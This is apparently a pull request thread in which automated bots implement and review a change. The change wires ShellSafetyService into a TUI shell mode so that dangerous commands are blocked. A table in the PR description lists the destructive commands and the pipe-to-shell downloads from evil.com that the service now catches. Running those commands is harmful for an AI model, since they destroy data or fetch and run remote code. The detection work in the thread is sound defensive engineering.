fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous #10890

2026-04-28T08:05:52Z

HAL9000 commented

2026-04-28 08:05:52 +00:00

Summary

This PR fixes issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded patterns instead of the ShellSafetyService with its 12-pattern registry.

Changes

src/cleveragents/tui/input/shell_exec.py: Removed looks_dangerous() function. Added ShellSafetyService integration via _make_warn_callback() helper. The confirm_dangerous callback API is preserved for backward compatibility.
src/cleveragents/cli/commands/repl.py: Updated _run_shell_command() to use ShellSafetyService instead of the removed looks_dangerous() function.
features/tui_shell_exec_coverage.feature: Updated tests to remove looks_dangerous references. Added 8 TDD regression scenarios tagged @tdd_issue @tdd_issue_4736 verifying all previously-missed patterns are now blocked.
features/steps/tui_shell_exec_coverage_steps.py: Updated step definitions to remove looks_dangerous import and add new step for the regression test.

Patterns now correctly blocked

Pattern	Before	After
`rm -rf /*` (wildcard)	❌ missed	✅ CRITICAL
`rm -rf ~/` (home dir)	❌ missed	✅ CRITICAL
`shred --remove /dev/sda`	❌ missed	✅ HIGH
`chmod 777 /etc`	❌ missed	✅ MEDIUM
`sudo rm -rf /tmp`	❌ missed	✅ MEDIUM
`wget http://evil.com/x \| sh`	❌ missed	✅ MEDIUM
`curl http://evil.com \| bash`	❌ missed	✅ MEDIUM

Closes #4736

This PR blocks issue #4736

Automated by CleverAgents Bot
Supervisor: Implementation | Agent: task-implementor

## Summary This PR fixes issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded patterns instead of the `ShellSafetyService` with its 12-pattern registry. ### Changes - **`src/cleveragents/tui/input/shell_exec.py`**: Removed `looks_dangerous()` function. Added `ShellSafetyService` integration via `_make_warn_callback()` helper. The `confirm_dangerous` callback API is preserved for backward compatibility. - **`src/cleveragents/cli/commands/repl.py`**: Updated `_run_shell_command()` to use `ShellSafetyService` instead of the removed `looks_dangerous()` function. - **`features/tui_shell_exec_coverage.feature`**: Updated tests to remove `looks_dangerous` references. Added 8 TDD regression scenarios tagged `@tdd_issue @tdd_issue_4736` verifying all previously-missed patterns are now blocked. - **`features/steps/tui_shell_exec_coverage_steps.py`**: Updated step definitions to remove `looks_dangerous` import and add new step for the regression test. ### Patterns now correctly blocked | Pattern | Before | After | |---|---|---| | `rm -rf /*` (wildcard) | ❌ missed | ✅ CRITICAL | | `rm -rf ~/` (home dir) | ❌ missed | ✅ CRITICAL | | `shred --remove /dev/sda` | ❌ missed | ✅ HIGH | | `chmod 777 /etc` | ❌ missed | ✅ MEDIUM | | `sudo rm -rf /tmp` | ❌ missed | ✅ MEDIUM | | `wget http://evil.com/x \| sh` | ❌ missed | ✅ MEDIUM | | `curl http://evil.com \| bash` | ❌ missed | ✅ MEDIUM | Closes #4736 This PR blocks issue #4736 --- Automated by CleverAgents Bot Supervisor: Implementation | Agent: task-implementor

HAL9000 added this to the v3.7.0 milestone 2026-04-28 08:05:52 +00:00

HAL9000 added 1 commit 2026-04-28 08:05:53 +00:00

fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

CI / benchmark-publish (pull_request) Has been skipped

Details

CI / helm (pull_request) Successful in 34s

Details

CI / build (pull_request) Successful in 52s

Details

CI / lint (pull_request) Failing after 1m7s

Details

CI / quality (pull_request) Successful in 1m15s

Details

CI / typecheck (pull_request) Successful in 1m36s

Details

CI / security (pull_request) Successful in 1m38s

Details

CI / coverage (pull_request) Has been skipped

Details

CI / push-validation (pull_request) Successful in 22s

Details

CI / unit_tests (pull_request) Failing after 3m27s

Details

CI / docker (pull_request) Has been skipped

Details

CI / integration_tests (pull_request) Successful in 4m36s

Details

CI / e2e_tests (pull_request) Successful in 5m3s

Details

CI / status-check (pull_request) Failing after 3s

Details

393127639e

Replace the inline 5-pattern looks_dangerous() function in shell_exec.py with
the ShellSafetyService (12-pattern registry, 4 severity levels). This fixes a
spec compliance bug where 7 of 12 dangerous patterns were silently bypassed.

Also update repl.py to use ShellSafetyService instead of looks_dangerous().

Add TDD regression tests (@tdd_issue, @tdd_issue_4736) verifying that all
previously-missed patterns (rm -rf wildcard, rm -rf ~/, shred --remove,
chmod 777, sudo rm, wget|sh, curl|bash) are now correctly blocked.

ISSUES CLOSED: #4736

HAL9000 referenced this pull request

2026-04-28 08:07:03 +00:00

UAT: TUI shell mode uses legacy `looks_dangerous()` in shell_exec.py — ShellSafetyService with 12-pattern registry is never invoked #4736

HAL9001 reviewed 2026-04-28 09:55:20 +00:00

HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked.

Checklist

CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper.
SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection.
TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr.
TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere.
READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly.
PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization.
SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher.
CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback.
DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration.
COMMIT AND PR QUALITY -- ISSUES NOTED:

Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR.
CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge.

Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns, while ShellSafetyService with its 12-pattern regex registry with severity levels (CRITICAL, HIGH, MEDIUM, LOW) was never invoked. ## Checklist 1. CORRECTNESS -- PASS. The replacement is correct. looks_dangerous() removed; ShellSafetyService.check_command() used with proper allowed result handling. The confirm_dangerous callback API is preserved via _make_warn_callback() wrapper. 2. SPECIFICATION ALIGNMENT -- PASS. Brings implementation in line with spec requirement that shell_exec.py use ShellSafetyService for danger detection. 3. TEST QUALITY -- PASS. Excellent: 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) covering all 7 previously-missed dangerous patterns. Step definitions properly updated. Verification that looks_dangerous was removed via module-level hasattr. 4. TYPE SAFETY -- PASS. All signatures annotated. No # type: ignore anywhere. 5. READABILITY -- PASS. _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded. repl.py uses is_safe() cleanly. 6. PERFORMANCE -- MINOR NOTE. ShellSafetyService instantiated on every call in both files. Negligible for infrequent user shell commands but worth noting for future optimization. 7. SECURITY -- NET IMPROVEMENT. The 12-pattern registry covers wildcard deletions, device destroyers, mass permission mods, pipe-to-shell social engineering, and sudo escalation -- all previously missed by the 5-pattern substring matcher. 8. CODE STYLE -- PASS. Under 500 lines, imports at top, SOLID followed (service encapsulates detection logic separate from execution), dependency injection via warn_callback. 9. DOCUMENTATION -- PASS. Expanded docstring on run_shell_command documenting the ShellSafetyService integration. 10. COMMIT AND PR QUALITY -- ISSUES NOTED: - Missing Type/ label: Pr has zero labels; Type/Bug should be applied for a bug-fix PR. - CI gate: lint, unit_tests, and status-check failing; coverage skipped. Per company policy all CI gates must pass before merge. Non-blocking: consider making the _warn_callback in repl.py a module-level function for consistency with shell_exec.py approach, but this is style preference. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 commented

2026-04-28 09:56:05 +00:00

PR Review Complete

Status: COMMENT (no blocking issues, suggestions provided)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**PR Review Complete** Status: **COMMENT** (no blocking issues, suggestions provided) --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 requested changes 2026-04-28 12:56:45 +00:00

Dismissed

HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 where shell_exec.py used a legacy inline looks_dangerous() function with only 5 hardcoded substring patterns instead of the ShellSafetyService with its 12-pattern regex registry.

Overall Assessment

The implementation quality is strong. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically:

CORRECTNESS ✅ — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both shell_exec.py and repl.py. The old 5-pattern substring matcher is fully removed.
SPECIFICATION ALIGNMENT ✅ — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry.
TEST QUALITY ✅ — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands.
TYPE SAFETY ✅ — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore.
READABILITY ✅ — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation.
SECURITY ✅ — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed.
CODE STYLE ✅ — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file.
DOCUMENTATION ✅ — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior.

Blocking Issues

1. CI Gates Failing

Three required CI checks are failing:

CI / lint (pull_request) — Failing (1m7s). This is a required gate.
CI / unit_tests (pull_request) — Failing (3m27s). This is a required gate.
CI / status-check (pull_request) — Failing (aggregator of required checks).

Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run nox -s lint to fix lint issues and nox -s unit_tests to diagnose and fix the test failures.

2. Missing Type/ Label

The PR has zero labels. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (Type/Bug). The contributing guidelines require exactly one Type/ label per PR.

Non-Blocking Notes

Minor: ShellSafetyService instantiation per call — Both shell_exec.py and repl.py instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 where `shell_exec.py` used a legacy inline `looks_dangerous()` function with only 5 hardcoded substring patterns instead of the `ShellSafetyService` with its 12-pattern regex registry. ## Overall Assessment The implementation quality is **strong**. The core changes are correct, well-typed, properly documented, and backed by comprehensive TDD regression tests. Specifically: - CORRECTNESS ✅ — ShellSafetyService.check_command() correctly replaces looks_dangerous() in both `shell_exec.py` and `repl.py`. The old 5-pattern substring matcher is fully removed. - SPECIFICATION ALIGNMENT ✅ — Brings the TUI shell mode into alignment with the spec requirement that it uses ShellSafetyService with its 12-pattern registry. - TEST QUALITY ✅ — 8 new TDD regression scenarios (all tagged @tdd_issue @tdd_issue_4736) cover every previously-missed pattern. Step definitions properly updated with mock handling to avoid executing dangerous commands. - TYPE SAFETY ✅ — All signatures annotated. Frozen dataclasses with slots=True. No # type: ignore. - READABILITY ✅ — _make_warn_callback clearly bridges old/new callback interfaces. Docstring expanded with threat model documentation. - SECURITY ✅ — Net improvement. The 12-pattern registry now covers wildcard deletions, device destroyers (shred), mass permission mods (chmod 777), pipe-to-shell social engineering (wget|sh, curl|bash), and sudo escalation — all previously silently allowed. - CODE STYLE ✅ — Files well under 500 lines. SOLID principles followed (service encapsulates detection logic; dependency injection via warn_callback). Imports at top of file. - DOCUMENTATION ✅ — Expanded docstring on run_shell_command documenting ShellSafetyService integration, threat model, and timeout behavior. ## Blocking Issues ### 1. CI Gates Failing Three required CI checks are failing: - **CI / lint (pull_request)** — Failing (1m7s). This is a required gate. - **CI / unit_tests (pull_request)** — Failing (3m27s). This is a required gate. - **CI / status-check (pull_request)** — Failing (aggregator of required checks). Per company policy, all CI gates must pass before a PR can be approved and merged. Coverage is also skipped (dependency on earlier jobs). The PR must be fixed locally: run `nox -s lint` to fix lint issues and `nox -s unit_tests` to diagnose and fix the test failures. ### 2. Missing Type/ Label The PR has **zero labels**. As a bug-fix PR targeting type/Bug territory (issue is explicitly Type/Bug), it must have exactly one Type/ label (`Type/Bug`). The contributing guidelines require exactly one Type/ label per PR. ## Non-Blocking Notes - **Minor: ShellSafetyService instantiation per call** — Both `shell_exec.py` and `repl.py` instantiate a new ShellSafetyService on every call. For infrequent interactive shell commands this is negligible, but worth noting for future optimization if the function becomes hot-path. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 commented

2026-04-28 12:57:50 +00:00

First Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Summary

PR #10890 correctly replaces the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios.

Blocking Issues

CI failure — lint, unit_tests, and status-check are failing. Per company policy, all CI gates must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
Missing Type/ label — PR has zero labels. As a bug-fix PR, it must have exactly one Type/ label (Type/Bug).

Checklist Results

Category	Status
Correctness	✅ PASS
Specification Alignment	✅ PASS
Test Quality	✅ PASS
Type Safety	✅ PASS
Readability	✅ PASS
Performance	⚠️ Minor note
Security	✅ PASS
Code Style	✅ PASS
Documentation	✅ PASS
Commit and PR Quality	❌ Failing (CI + labels)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**First Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Summary PR #10890 correctly replaces the legacy 5-pattern `looks_dangerous()` function with the `ShellSafetyService` 12-pattern registry across both `shell_exec.py` and `repl.py`. The code quality is strong — well-typed, documented, and covered by 8 TDD regression scenarios. ### Blocking Issues 1. **CI failure** — `lint`, `unit_tests`, and `status-check` are failing. Per company policy, all CI gates must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/ label** — PR has zero labels. As a bug-fix PR, it must have exactly one `Type/` label (`Type/Bug`). ### Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS | | Specification Alignment | ✅ PASS | | Test Quality | ✅ PASS | | Type Safety | ✅ PASS | | Readability | ✅ PASS | | Performance | ⚠️ Minor note | | Security | ✅ PASS | | Code Style | ✅ PASS | | Documentation | ✅ PASS | | Commit and PR Quality | ❌ Failing (CI + labels) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 requested changes 2026-04-28 14:26:45 +00:00

Dismissed

HAL9001 left a comment

Review Summary

PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous

This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added.

Previous Feedback Check

The previous review (HAL9001, REQUEST_CHANGES) flagged:

CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR
Missing Type/ label -- Still absent. PR still has zero labels.

Blocking Issues

1. Test scenarios broken by step removal

The step definition @when("I run a dangerous command ... with the callback") was removed but two scenarios in tui_shell_exec_coverage.feature still reference it:

Scenario: "Dangerous command confirmed via callback proceeds to execution"
Scenario: "Dangerous command confirmed but callback returns False is still blocked"

These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail.

Options:

Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR
Remove these scenarios entirely since callback behavior is now tested through TDD regression tests

2. Missing Type/ Label

Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels.

Checklist Results

Category	Status
Correctness	PASS
Specification Alignment	PASS
Test Quality	FAIL - 2 orphaned scenarios reference deleted step definitions
Type Safety	PASS
Readability	PASS
Performance	Minor note - ShellSafetyService instantiated per call
Security	PASS - Net improvement: 7 previously-silent patterns now blocked
Code Style	PASS
Documentation	PASS
Commit and PR Quality	FAIL - Missing Type/ label, CI failing

Non-Blocking Notes

The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency.
TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

## Review Summary PR #10890: fix(tui): wire ShellSafetyService into run_shell_command replacing legacy looks_dangerous This PR addresses issue #4736 by replacing the legacy 5-pattern looks_dangerous() function with the ShellSafetyService 12-pattern registry across both shell_exec.py and repl.py. The code refactoring is well-executed: types are correct, docstrings expanded, the confirm_dangerous callback API is preserved via _make_warn_callback(), and 8 TDD regression scenarios added. ## Previous Feedback Check The previous review (HAL9001, REQUEST_CHANGES) flagged: 1. CI failing (lint, unit_tests, status-check) -- Still failing, now due to test regressions introduced by THIS PR 2. Missing Type/ label -- Still absent. PR still has zero labels. ## Blocking Issues ### 1. Test scenarios broken by step removal The step definition `@when("I run a dangerous command ... with the callback")` was removed but two scenarios in tui_shell_exec_coverage.feature still reference it: - Scenario: "Dangerous command confirmed via callback proceeds to execution" - Scenario: "Dangerous command confirmed but callback returns False is still blocked" These orphaned scenarios will produce "Step not implemented" errors in Behave, causing unit_tests to fail. Options: - Rewrite these scenarios to use the confirm_dangerous callback with the new API and mock subprocess.run, OR - Remove these scenarios entirely since callback behavior is now tested through TDD regression tests ### 2. Missing Type/ Label Per CONTRIBUTING.md, the PR must have exactly one Type/ label. As a bug-fix PR, it should have Type/Bug. The PR currently has zero labels. ## Checklist Results | Category | Status | |---|---| | Correctness | PASS | | Specification Alignment | PASS | | Test Quality | FAIL - 2 orphaned scenarios reference deleted step definitions | | Type Safety | PASS | | Readability | PASS | | Performance | Minor note - ShellSafetyService instantiated per call | | Security | PASS - Net improvement: 7 previously-silent patterns now blocked | | Code Style | PASS | | Documentation | PASS | | Commit and PR Quality | FAIL - Missing Type/ label, CI failing | ## Non-Blocking Notes - The _warn_callback in repl.py is a nested function while shell_exec.py uses module-level _make_warn_callback(). Consider moving to module level for consistency. - TDD regression scenarios do not mock subprocess.run. Works correctly now but could be fragile if test commands change from dangerous to non-dangerous. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

features/tui_shell_exec_coverage.feature

						
				@@ -48,0 +50,4 @@

				  # These scenarios verify that ShellSafetyService (12-pattern registry) is

				  # used instead of the legacy looks_dangerous() function.

				  @tdd_issue @tdd_issue_4736

HAL9001 commented

2026-04-28 14:26:45 +00:00

Two scenarios reference step definitions removed in this PR. The step @when('I run a dangerous command with the callback') no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.

Two scenarios reference step definitions removed in this PR. The step `@when('I run a dangerous command with the callback')` no longer exists. These scenarios will fail with "Step not implemented" errors. Please either remove the orphaned scenarios or rewrite them to use the new callback API.

src/cleveragents/cli/commands/repl.py

						
				@@ -389,3 +389,3 @@

				        _console.print("[yellow]Shell mode is disabled by configuration.[/yellow]")

				        return 2

				    if looks_dangerous(command_text):

				    def _warn_callback(warning: DangerousCommandWarning) -> bool:

HAL9001 commented

2026-04-28 14:26:45 +00:00

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

The _warn_callback is a nested function inside _run_shell_command(). In shell_exec.py, the equivalent uses module-level _make_warn_callback(). Consider moving to module level for consistency across the two files. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 commented

2026-04-28 14:27:23 +00:00

Automated review complete for PR #10890.

Result: REQUEST_CHANGES

Blocking issues:

Two orphaned Behave scenarios reference deleted step definitions (@when("I run a dangerous command ... with the callback")), causing unit_tests to fail with "Step not implemented" errors.
Missing Type/Bug label -- the PR has zero labels.

Code quality is strong: correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively.

Non-blocking notes: Consider moving the _warn_callback in repl.py to module level for consistency, and consider mocking subprocess.run in TDD regression scenarios for robustness.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

Automated review complete for PR #10890. **Result: REQUEST_CHANGES** **Blocking issues:** 1. Two orphaned Behave scenarios reference deleted step definitions (`@when("I run a dangerous command ... with the callback")`), causing `unit_tests` to fail with "Step not implemented" errors. 2. Missing `Type/Bug` label -- the PR has zero labels. **Code quality is strong:** correctness, specification alignment, type safety, readability, security (net improvement), code style, and documentation all pass. The ShellSafetyService integration replaces the legacy 5-pattern matcher with the full 12-pattern registry effectively. **Non-blocking notes:** Consider moving the `_warn_callback` in `repl.py` to module level for consistency, and consider mocking `subprocess.run` in TDD regression scenarios for robustness. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9000 added 1 commit 2026-04-28 17:54:59 +00:00

fix(tui): update tui_input_modes_steps.py to use ShellSafetyService instead of removed looks_dangerous

CI / benchmark-publish (pull_request) Has been skipped

Details

CI / push-validation (pull_request) Successful in 35s

Details

CI / helm (pull_request) Successful in 47s

Details

CI / build (pull_request) Successful in 1m2s

Details

CI / lint (pull_request) Failing after 1m30s

Details

CI / quality (pull_request) Successful in 1m38s

Details

CI / typecheck (pull_request) Successful in 1m56s

Details

CI / security (pull_request) Successful in 1m55s

Details

CI / coverage (pull_request) Has been skipped

Details

CI / integration_tests (pull_request) Successful in 5m2s

Details

CI / e2e_tests (pull_request) Successful in 5m44s

Details

CI / unit_tests (pull_request) Failing after 6m30s

Details

CI / docker (pull_request) Has been skipped

Details

CI / status-check (pull_request) Failing after 3s

Details

730c225298

HAL9001 requested changes 2026-04-28 19:02:35 +00:00

HAL9001 left a comment

Second Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior Feedback Status

#	Previous Concern	Status
1	Orphaned step definitions (`with the callback`)	✅ ADDRESSED — step definition exists at line 107 of `tui_shell_exec_coverage_steps.py`, feature file correctly references it with subprocess.run mocking
2	_warn_callback nested function (non-blocking)	⚠️ Not addressed yet (non-blocking suggestion)

Blocking Issues

CI failure — lint and unit_tests are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run nox -s lint and nox -s unit_tests to diagnose and fix.
Missing Type/Bug label — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (Type/Bug).
Missing milestone and changelog — The PR body does not include a closing keyword (Closes/Fixes) for issue #4736 on its own line per PR requirements.

Checklist Results

Category	Status
Correctness	✅ PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry
Specification Alignment	✅ PASS — Aligns with spec that TUI shell mode should use ShellSafetyService
Test Quality	✅ PASS — 8 TDD regression scenarios (`@tdd_issue_4736`) cover all 7 previously-missed patterns plus removal verification
Type Safety	✅ PASS — All signatures annotated, zero `# type: ignore`
Readability	✅ PASS — Clear names, clean adapter pattern in `_make_warn_callback`
Performance	✅ PASS — No concerns
Security	✅ PASS — Net improvement: 5→12 patterns, proper regex vs substring matching
Code Style	⚠️ Minor — `_warn_callback` in `repl.py` is a nested function while `shell_exec.py` uses module-level `_make_warn_callback()` for consistency
Documentation	✅ PASS — Docstrings present for all public functions
Commit and PR Quality	❌ FAILING (CI + labels + closing keyword)

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Second Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior Feedback Status | # | Previous Concern | Status | |---|---|---| | 1 | Orphaned step definitions (`with the callback`) | ✅ ADDRESSED — step definition exists at line 107 of `tui_shell_exec_coverage_steps.py`, feature file correctly references it with subprocess.run mocking | | 2 | _warn_callback nested function (non-blocking) | ⚠️ Not addressed yet (non-blocking suggestion) | ## Blocking Issues 1. **CI failure** — `lint` and `unit_tests` are failing. Per company policy, all CI gates (lint, typecheck, security, unit_tests, coverage) must pass before merge. Run `nox -s lint` and `nox -s unit_tests` to diagnose and fix. 2. **Missing Type/Bug label** — The PR has zero labels. As a bug-fix PR closing issue #4736 (which has Type/Bug), it must have exactly one Type/ label (`Type/Bug`). 3. **Missing milestone and changelog** — The PR body does not include a closing keyword (`Closes`/`Fixes`) for issue #4736 on its own line per PR requirements. ## Checklist Results | Category | Status | |---|---| | Correctness | ✅ PASS — ShellSafetyService correctly wired, 5-pattern legacy replaced with 12-pattern registry | | Specification Alignment | ✅ PASS — Aligns with spec that TUI shell mode should use ShellSafetyService | | Test Quality | ✅ PASS — 8 TDD regression scenarios (`@tdd_issue_4736`) cover all 7 previously-missed patterns plus removal verification | | Type Safety | ✅ PASS — All signatures annotated, zero `# type: ignore` | | Readability | ✅ PASS — Clear names, clean adapter pattern in `_make_warn_callback` | | Performance | ✅ PASS — No concerns | | Security | ✅ PASS — Net improvement: 5→12 patterns, proper regex vs substring matching | | Code Style | ⚠️ Minor — `_warn_callback` in `repl.py` is a nested function while `shell_exec.py` uses module-level `_make_warn_callback()` for consistency | | Documentation | ✅ PASS — Docstrings present for all public functions | | Commit and PR Quality | ❌ FAILING (CI + labels + closing keyword) | --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 commented

2026-04-28 19:03:05 +00:00

Re-Review Complete

Review result: REQUEST_CHANGES (2 blocking issues)

Prior feedback addressed:

Orphaned step definitions (with the callback) — ✅ FIXED
_warn_callback nested function — ⚠️ Not addressed (non-blocking suggestion only)

Blocking issues (same as previous review):

CI failure — lint and unit_tests are still failing. All CI gates must pass.
Missing Type/Bug label — PR has zero labels.

Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation.

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Re-Review Complete** Review result: **REQUEST_CHANGES** (2 blocking issues) ## Prior feedback addressed: 1. Orphaned step definitions (`with the callback`) — ✅ FIXED 2. `_warn_callback` nested function — ⚠️ Not addressed (non-blocking suggestion only) ## Blocking issues (same as previous review): 1. **CI failure** — `lint` and `unit_tests` are still failing. All CI gates must pass. 2. **Missing Type/Bug label** — PR has zero labels. ## Code quality: PASS for correctness, spec alignment, tests, type safety, readability, security, documentation. --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9001 commented

2026-04-28 19:39:07 +00:00

Correction to my previous review (#7090)

In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain Closes #4736 on its own line — this is fine.

The actual remaining blockers are:

CI failure — lint and unit_tests still failing
Missing Type/Bug label — PR has zero labels

Automated by CleverAgents Bot
Supervisor: PR Review | Agent: pr-review-worker

**Correction to my previous review (#7090)** In review #7090 I incorrectly flagged "Missing closing keyword" as a blocking issue. The PR body does contain `Closes #4736` on its own line — this is fine. The actual remaining blockers are: 1. **CI failure** — `lint` and `unit_tests` still failing 2. **Missing Type/Bug label** — PR has zero labels --- Automated by CleverAgents Bot Supervisor: PR Review | Agent: pr-review-worker

HAL9000 referenced this pull request

2026-05-31 16:12:03 +00:00

fix(tui): integrate ShellSafetyService properly in TUI app #6576

HAL9000 referenced this pull request

2026-06-04 21:16:25 +00:00

fix(tui): run shell commands asynchronously to prevent event loop blocking #10638

HAL9000 referenced this pull request

2026-06-04 21:20:08 +00:00

fix(tui): use ShellSafetyService regex patterns in looks_dangerous() #10642

HAL9000 referenced this pull request

2026-06-06 12:17:10 +00:00

fix(providers): enforce per-plan budget in FallbackSelector.select() #10747

HAL9000 added the controller-managed label 2026-06-07 02:22:31 +00:00

HAL9000 added the

labels 2026-06-07 02:26:23 +00:00

HAL9000 commented

2026-06-07 02:40:11 +00:00

[CONTROLLER-DEFER:Gate 1:needs_evaluation]

This PR has been deferred for re-evaluation. The controller has stepped back
from processing it. To resume, a human or scope-evaluator must clear the
deferral flag AND re-add the auto/sentinel label.

Decision:

Gate: Gate 1
Reason category: needs_evaluation
Canonical: #-
LLM confidence: medium
LLM reasoning: PR #10890 and #11112 have identical titles and both close issue #4736, solving the same shell safety problem. #11112's branch name "fix/pr-10890-shell-safety-integration" confirms topical overlap. #10890 explicitly documents 8 TDD regression scenarios (quality signal), while #11112 has 4x more additions but fewer files touched (534 add/16 del across 3 files vs 129 add/41 del across 5 files). Without full PR bodies and CI status, it's unclear which is more complete or whether they represent different implementation approaches to the same fix.
